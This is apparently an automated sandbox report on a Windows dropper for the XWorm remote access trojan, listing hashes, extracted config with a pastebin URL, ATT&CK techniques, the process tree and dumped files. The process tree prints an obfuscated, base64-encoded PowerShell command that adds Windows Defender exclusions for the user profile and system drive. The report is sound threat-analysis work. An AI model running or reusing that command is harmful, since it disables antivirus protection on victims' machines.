xworm | 2da50060f34dbe8ae3cb42988efbe40546eba522f090958013b3e47178aa04c7

Analysis

max time kernel
92s
max time network
144s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
04/03/2025, 21:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NHCUR_BootstrapperNew.exe
Size

2.9MB
MD5

8f4833925c458ee2c6b40ef0e0b978f0
SHA1

f37823826806dfe3ab30f6f92ee9807ca3265332
SHA256

2da50060f34dbe8ae3cb42988efbe40546eba522f090958013b3e47178aa04c7
SHA512

88b81b3d204b6ef0234740a0795659f6a924b5106a80cac8d4d174a48003285b395598952de6c03075f15b3cf1055d86d3e604b1346eb8285f098dc71f0e4e97
SSDEEP

49152:8gnJGTce2a1Qo0JjdjW62omu2pCoXghq86WKAlQAd882TQaa0t/s/LAZ42Q:tE4eBOo0JjdjpJcNA9882kJbMC

Score

10^/10

xworm defense_evasion discovery rat trojan

Malware Config

Extracted

Family

xworm

Attributes

Install_directory
%port%
install_file
svchost.exe
pastebin_url
https://pastebin.com/raw/GMv8QPCE

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0005000000022b3b-20.dat	family_xworm
behavioral2/memory/1216-24-0x0000000000430000-0x0000000000444000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	NHCUR_BootstrapperNew.exe

Executes dropped EXE 2 IoCs

pid	Process
3096	BootstrapperNew.exe
1216	WMI Provider Host.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
7	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NHCUR_BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1076	powershell.exe
1076	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1216	WMI Provider Host.exe
Token: SeDebugPrivilege	1076	powershell.exe

Suspicious use of WriteProcessMemory 7 IoCs

description	pid	Process	procid_target
PID 2364 wrote to memory of 1076	2364	NHCUR_BootstrapperNew.exe	89
PID 2364 wrote to memory of 1076	2364	NHCUR_BootstrapperNew.exe	89
PID 2364 wrote to memory of 1076	2364	NHCUR_BootstrapperNew.exe	89
PID 2364 wrote to memory of 3096	2364	NHCUR_BootstrapperNew.exe	91
PID 2364 wrote to memory of 3096	2364	NHCUR_BootstrapperNew.exe	91
PID 2364 wrote to memory of 1216	2364	NHCUR_BootstrapperNew.exe	92
PID 2364 wrote to memory of 1216	2364	NHCUR_BootstrapperNew.exe	92

C:\Users\Admin\AppData\Local\Temp\NHCUR_BootstrapperNew.exe
"C:\Users\Admin\AppData\Local\Temp\NHCUR_BootstrapperNew.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2364
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAZgByACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAdQBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAegBzACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1076
- C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
  "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
  2⤵
  - Executes dropped EXE
  PID:3096
- C:\Users\Admin\AppData\Local\Temp\WMI Provider Host.exe
  "C:\Users\Admin\AppData\Local\Temp\WMI Provider Host.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1216

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe

Filesize
2.9MB

MD5
f227cdfd423b3cc03bb69c49babf4da3

SHA1
3db5a97d9b0f2545e7ba97026af6c28512200441

SHA256
cb5d6c1ca0aa6232a2d55e14b20ac4a9945a0bd063c57d60a5ed3ae94160e3e8

SHA512
b10afd03b02a928545c16fad39a6ae46b68b1e1a2477a6990803ce80008e7161fb2ebc9380ba15a1b074bb436aa34bcd6c94a922933d438b1c22489717e1e10e

Download Submit
C:\Users\Admin\AppData\Local\Temp\WMI Provider Host.exe

Filesize
57KB

MD5
7f4631cc67828fc55d6c8bd1af02bf44

SHA1
54d6e1c3e0b655d231d461e32d187c0f2338295d

SHA256
5361c6e459fd49ee6a11f586c5dd3a2626f1338cdc4ce661287f48966451a6dd

SHA512
f931f8bde5aa6c2d528031fd5505eb6a0044edddcd1c5798ef762102e8d59e5701087259258d5cc15fea59e1e199f2c870fa95ad748a8e20680096cc4d62c348

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4j0a4v51.vjs.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1076-75-0x0000000007600000-0x000000000761A000-memory.dmp

Filesize
104KB

Download
memory/1076-74-0x0000000007C50000-0x00000000082CA000-memory.dmp

Filesize
6.5MB

Download
memory/1076-25-0x0000000004D10000-0x0000000004D46000-memory.dmp

Filesize
216KB

Download
memory/1076-26-0x00000000053B0000-0x00000000059D8000-memory.dmp

Filesize
6.2MB

Download
memory/1076-83-0x0000000007880000-0x0000000007888000-memory.dmp

Filesize
32KB

Download
memory/1076-82-0x0000000007930000-0x000000000794A000-memory.dmp

Filesize
104KB

Download
memory/1076-29-0x0000000004D70000-0x0000000004D80000-memory.dmp

Filesize
64KB

Download
memory/1076-28-0x0000000004D70000-0x0000000004D80000-memory.dmp

Filesize
64KB

Download
memory/1076-31-0x0000000073A6E000-0x0000000073A6F000-memory.dmp

Filesize
4KB

Download
memory/1076-32-0x0000000005330000-0x0000000005352000-memory.dmp

Filesize
136KB

Download
memory/1076-33-0x0000000005A50000-0x0000000005AB6000-memory.dmp

Filesize
408KB

Download
memory/1076-34-0x0000000005AC0000-0x0000000005B26000-memory.dmp

Filesize
408KB

Download
memory/1076-81-0x0000000007850000-0x0000000007864000-memory.dmp

Filesize
80KB

Download
memory/1076-80-0x0000000007840000-0x000000000784E000-memory.dmp

Filesize
56KB

Download
memory/1076-78-0x0000000007800000-0x0000000007811000-memory.dmp

Filesize
68KB

Download
memory/1076-77-0x0000000007890000-0x0000000007926000-memory.dmp

Filesize
600KB

Download
memory/1076-76-0x0000000007670000-0x000000000767A000-memory.dmp

Filesize
40KB

Download
memory/1076-48-0x00000000062D0000-0x00000000062EE000-memory.dmp

Filesize
120KB

Download
memory/1076-49-0x0000000006310000-0x000000000635C000-memory.dmp

Filesize
304KB

Download
memory/1076-73-0x00000000074D0000-0x0000000007573000-memory.dmp

Filesize
652KB

Download
memory/1076-72-0x00000000072A0000-0x00000000072BE000-memory.dmp

Filesize
120KB

Download
memory/1076-62-0x0000000075050000-0x000000007509C000-memory.dmp

Filesize
304KB

Download
memory/1076-61-0x00000000068B0000-0x00000000068E2000-memory.dmp

Filesize
200KB

Download
memory/1076-46-0x0000000005E70000-0x00000000061C4000-memory.dmp

Filesize
3.3MB

Download
memory/1216-40-0x00000000023D0000-0x00000000023E0000-memory.dmp

Filesize
64KB

Download
memory/1216-27-0x00007FFCA43C0000-0x00007FFCA4E81000-memory.dmp

Filesize
10.8MB

Download
memory/1216-24-0x0000000000430000-0x0000000000444000-memory.dmp

Filesize
80KB

Download
memory/1216-79-0x00007FFCA43C0000-0x00007FFCA4E81000-memory.dmp

Filesize
10.8MB

Download
memory/3096-51-0x0000026B72A30000-0x0000026B72A3E000-memory.dmp

Filesize
56KB

Download
memory/3096-45-0x0000026B6D450000-0x0000026B6D460000-memory.dmp

Filesize
64KB

Download
memory/3096-54-0x0000026B72EA0000-0x0000026B72EC6000-memory.dmp

Filesize
152KB

Download
memory/3096-53-0x0000026B72A40000-0x0000026B72A4A000-memory.dmp

Filesize
40KB

Download
memory/3096-47-0x0000026B72A50000-0x0000026B72A58000-memory.dmp

Filesize
32KB

Download
memory/3096-59-0x0000026B73E60000-0x0000026B73E68000-memory.dmp

Filesize
32KB

Download
memory/3096-22-0x00007FFCA43C3000-0x00007FFCA43C5000-memory.dmp

Filesize
8KB

Download
memory/3096-52-0x0000026B73D60000-0x0000026B73E60000-memory.dmp

Filesize
1024KB

Download
memory/3096-55-0x0000026B72F20000-0x0000026B72F28000-memory.dmp

Filesize
32KB

Download
memory/3096-23-0x0000026B6AD70000-0x0000026B6B052000-memory.dmp

Filesize
2.9MB

Download
memory/3096-58-0x0000026B72E90000-0x0000026B72E9A000-memory.dmp

Filesize
40KB

Download
memory/3096-50-0x0000026B72ED0000-0x0000026B72F08000-memory.dmp

Filesize
224KB

Download
memory/3096-57-0x0000026B72F10000-0x0000026B72F1A000-memory.dmp

Filesize
40KB

Download
memory/3096-30-0x0000026B6D470000-0x0000026B6D480000-memory.dmp

Filesize
64KB

Download
memory/3096-56-0x0000026B72F30000-0x0000026B72F46000-memory.dmp

Filesize
88KB

Download
memory/3096-87-0x0000026B6D470000-0x0000026B6D480000-memory.dmp

Filesize
64KB

Download
memory/3096-86-0x00007FFCA43C3000-0x00007FFCA43C5000-memory.dmp

Filesize
8KB

Download